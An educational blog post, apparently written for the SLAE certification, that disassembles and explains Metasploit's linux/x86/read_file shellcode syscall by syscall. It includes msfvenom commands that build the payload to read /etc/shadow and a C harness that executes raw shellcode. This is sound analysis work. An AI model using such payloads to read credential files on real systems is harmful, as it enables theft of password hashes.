SLAE #5: linux/x86/read_file

In this blog post we’re going to analyze the linux/x86/read_file payload from Metasploit.

There are two required options. The first one is the file descriptor to write the output to, which defaults to the standard output. The second one is the path to the file we want to read.

$ msfvenom -p linux/x86/read_file --payload-options
Options for payload/linux/x86/read_file

       Name: Linux Read File
     Module: payload/linux/x86/read_file
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 184
       Rank: Normal

Provided by:

Basic options:
Name  Current Setting  Required  Description
----  ---------------  --------  -----------
FD    1                yes       The file descriptor to write output to
PATH                   yes       The file path to read

  Read up to 4096 bytes from the local file system and write it back 
  out to the specified file descriptor

Let’s set the path to /etc/shadow and use ndisasm to get the disassembled output.

$ msfvenom -p linux/x86/read_file PATH=/etc/shadow | ndisasm -u -
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload

00000000  EB36              jmp short 0x38
00000002  B805000000        mov eax,0x5
00000007  5B                pop ebx
00000008  31C9              xor ecx,ecx
0000000A  CD80              int 0x80
0000000C  89C3              mov ebx,eax
0000000E  B803000000        mov eax,0x3
00000013  89E7              mov edi,esp
00000015  89F9              mov ecx,edi
00000017  BA00100000        mov edx,0x1000
0000001C  CD80              int 0x80
0000001E  89C2              mov edx,eax
00000020  B804000000        mov eax,0x4
00000025  BB01000000        mov ebx,0x1
0000002A  CD80              int 0x80
0000002C  B801000000        mov eax,0x1
00000031  BB00000000        mov ebx,0x0
00000036  CD80              int 0x80
00000038  E8C5FFFFFF        call dword 0x2
0000003D  2F                das
0000003E  657463            gs jz 0xa4
00000041  2F                das
00000042  7368              jnc 0xac
00000044  61                popad
00000045  646F              fs outsd
00000047  7700              ja 0x49

The first instruction jumps to offset 0x38, which in turn is a call instruction to offset 0x2. It looks like the JMP-CALL-POP technique is taking place. This means that the instructions starting from offset 0x3D might in fact be the path string being misinterpreted by ndisasm.
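As a sanity check on those two branch targets, here is a minimal Python sketch that decodes the relative displacements by hand. The helper names rel8_target and rel32_target are made up for this illustration; the opcode bytes are copied from the ndisasm listing above.

```python
import struct

def rel8_target(offset, encoding):
    """Target of a 2-byte short jump (opcode EB, signed 8-bit displacement)."""
    (disp,) = struct.unpack("<b", encoding[1:2])
    # Displacements are relative to the address of the next instruction.
    return offset + len(encoding) + disp

def rel32_target(offset, encoding):
    """Target of a 5-byte near call (opcode E8, signed 32-bit displacement)."""
    (disp,) = struct.unpack("<i", encoding[1:5])
    return offset + len(encoding) + disp

jmp_target = rel8_target(0x00, bytes.fromhex("EB36"))
call_target = rel32_target(0x38, bytes.fromhex("E8C5FFFFFF"))
# The call pushes the address of the byte that follows it.
return_address = 0x38 + 5

print(hex(jmp_target), hex(call_target), hex(return_address))
```

This prints 0x38 0x2 0x3d: the jump lands on the call, the call lands on offset 0x2, and the pushed return address is 0x3D, exactly where the suspicious bytes begin.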

There are four system calls being executed from the disassembly offset 0x2 to the call instruction at offset 0x38. Let’s analyze each one and see what they are doing.

mov eax,0x5
pop ebx
xor ecx,ecx
int 0x80

eax contains the system call identifier. It is being set to 5, so it corresponds to the open syscall.

$ grep -w 5 /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_open 5

The relevant manpage contains the function’s signature.

int open(const char *pathname, int flags);

The second instruction pops the value at the top of the stack into the ebx register. That value is the return address pushed by the call instruction at offset 0x38, that is, the address of the byte right after it. Since the program is using the JMP-CALL-POP technique and ebx holds the char *pathname parameter, we can conclude that everything starting from offset 0x3D is the file path string. We’ll analyze the hex values later in the post.

Finally, ecx is zeroed out, which corresponds to the flags parameter being set to O_RDONLY as shown in the fcntl.h header file.

$ grep O_RDONLY /usr/include/asm-generic/fcntl.h 
#define O_RDONLY    00000000

If the call to open is successful, the file descriptor will be stored in the eax register.
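The register convention used throughout the payload (syscall number in eax, first three arguments in ebx, ecx and edx, result back in eax) can be summed up in a small Python sketch. The table only lists the four syscall numbers that appear in this post, and describe_syscall is a hypothetical helper written for this illustration.

```python
# i386 int 0x80 convention: eax = syscall number, ebx/ecx/edx = first three arguments.
SYSCALL_NAMES = {1: "exit", 3: "read", 4: "write", 5: "open"}

def describe_syscall(eax, ebx=None, ecx=None, edx=None):
    """Render register values as the C-style call they represent."""
    args = [a for a in (ebx, ecx, edx) if a is not None]
    return "{}({})".format(SYSCALL_NAMES[eax], ", ".join(str(a) for a in args))

# First block of the payload: eax=5, ebx=pointer to the path, ecx=0 (O_RDONLY).
print(describe_syscall(5, "path", 0))
```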

Moving on to the next block of code.

mov ebx,eax
mov eax,0x3
mov edi,esp
mov ecx,edi
mov edx,0x1000
int 0x80

The first instruction saves the file descriptor to ebx. Afterwards, eax is set to 3, which allows us to identify the read system call.

$ grep -w 3 /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_read 3

man 2 read describes the function signature.

ssize_t read(int fd, void *buf, size_t count);

ebx holds the file descriptor returned by open. esp is copied to edi and then to ecx, so ecx (the void *buf parameter) points to the top of the stack, where read will store the bytes it reads.

The edx register corresponds to the size_t count parameter. It is set to 0x1000, which means it will attempt to read up to 4096 bytes.

Finally, the int 0x80 instruction takes place, making the call to read.

mov edx,eax
mov eax,0x4
mov ebx,0x1
int 0x80

The first instruction of this block stores the returned value from the read operation into the edx register. Keep in mind that read returns the number of bytes read on success.

The syscall identifier in this case is 4.

$ grep -w 4 /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_write 4

Again, looking at the manpage for write we can get its signature.

ssize_t write(int fd, const void *buf, size_t count);

ebx is set to 1, the standard output, which matches the default value of the FD option.

The value in ecx has not been modified since the call to read, so it still points to the buffer stored in the stack. In addition, edx contains the number of bytes to write.

The final call to int 0x80 executes the syscall.

mov eax,0x1
mov ebx,0x0
int 0x80

The last part of the program before the call instruction invokes exit with a status code of 0 (the value in ebx), so the process terminates cleanly.

$ grep -w 1 /usr/include/i386-linux-gnu/asm/unistd_32.h
#define _ASM_X86_UNISTD_32_H 1
#define __NR_exit 1
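Putting the four syscalls together, the payload behaves roughly like the following Python sketch. This is a high-level approximation rather than a translation: read_file_payload is a name chosen for this example, Python raises exceptions where the shellcode ignores errors, and the close call is an addition (the payload never closes the descriptor because it exits right away).

```python
import os

def read_file_payload(path, out_fd=1, count=0x1000):
    """Rough equivalent of the payload's open/read/write sequence."""
    fd = os.open(path, os.O_RDONLY)    # eax=5: open(path, O_RDONLY)
    data = os.read(fd, count)          # eax=3: read(fd, buf, 0x1000)
    os.close(fd)                       # not in the payload, added for tidiness
    written = os.write(out_fd, data)   # eax=4: write(out_fd, buf, bytes_read)
    return written                     # the payload follows up with exit(0)
```

Calling read_file_payload with a readable path writes at most the first 4096 bytes of that file to standard output, which is the behavior the module description promises.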

To confirm that all the gibberish after the call instruction is the file path, we can get the hexadecimal values and interpret them as ASCII values.

>>> bytes.fromhex("2F6574632F736861646F7700")
b'/etc/shadow\x00'

It seems we were right! It’s just the NUL-terminated file path, which ndisasm misinterpreted as code.

Let’s actually execute the payload and see if its behavior matches the analysis. We can use msfvenom to encode the shellcode in order to get rid of bad characters (\x00 in this case).

$ msfvenom -p linux/x86/read_file PATH=/etc/shadow -f c -b '\x00'
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 22 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 100 (iteration=0)
unsigned char buf[] = 
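To see why excluding \x00 matters here, the following Python sketch counts the NUL bytes in the unencoded payload. The byte string is transcribed by hand from the ndisasm listing earlier in the post, so treat it as an assumption that it matches what msfvenom emits for PATH=/etc/shadow.

```python
# Raw payload bytes transcribed from the ndisasm listing (PATH=/etc/shadow).
RAW_PAYLOAD = bytes.fromhex(
    "EB36" "B805000000" "5B" "31C9" "CD80"
    "89C3" "B803000000" "89E7" "89F9" "BA00100000" "CD80"
    "89C2" "B804000000" "BB01000000" "CD80"
    "B801000000" "BB00000000" "CD80"
    "E8C5FFFFFF" "2F6574632F736861646F7700"
)

nul_count = RAW_PAYLOAD.count(b"\x00")
# A C strlen() stops at the first NUL, so this is the length it would report.
first_nul = RAW_PAYLOAD.index(b"\x00")

print(len(RAW_PAYLOAD), nul_count, first_nul)
```

This prints 73 23 4: the raw payload is 73 bytes long, 23 of them are NUL, and strlen would stop after only 4 bytes. Any string-based copy of the raw bytes would be cut short in the same way, which is what the encoder avoids.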

Insert the encoded shellcode in our shellcode tester file.

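#include <stdio.h>
#include <string.h>

unsigned char code[] =
    /* paste the encoded shellcode emitted by msfvenom here */;

int main() {
    /* strlen stops at the first NUL byte, hence the -b '\x00' encoding */
    printf("Shellcode Length:  %zu\n", strlen((const char *)code));
    /* treat the byte array as a function and jump into it */
    int (*ret)() = (int(*)())code;
    ret();
    return 0;
}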

Compile it.

$ gcc -o shellcode shellcode.c -z execstack

And run it.

$ ./shellcode 
Shellcode Length:  100

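Hmm, there’s no output. Why is that? The file we are trying to read cannot be accessed by regular users, since it contains the users’ password hashes. The payload does no error checking, so when open fails, read is handed an invalid descriptor and nothing gets printed.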

$ ls -l /etc/shadow
-rw-r----- 1 root shadow 1062 Mar  4 16:57 /etc/shadow
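At the syscall level, a failed open does not raise anything: the kernel returns a negative errno value in eax, and the payload copies it into ebx as if it were a file descriptor. The Python sketch below mimics that return convention; open_status is a hypothetical helper for this illustration, not part of the payload.

```python
import errno
import os

def open_status(path):
    """Return 0 if the file opens read-only, else -errno like the raw syscall."""
    try:
        fd = os.open(path, os.O_RDONLY)
    except OSError as exc:
        return -exc.errno
    os.close(fd)
    return 0

status = open_status("/etc/shadow")
if status == -errno.EACCES:
    print("open failed: permission denied")
elif status == 0:
    print("open succeeded")
```

Run as a regular user on a system with the permissions shown above, the first branch is the expected one; run as root, the open succeeds.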

Running the shellcode as root produces the desired results.

$ sudo ./shellcode 
Shellcode Length:  100

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID: SLAE-651

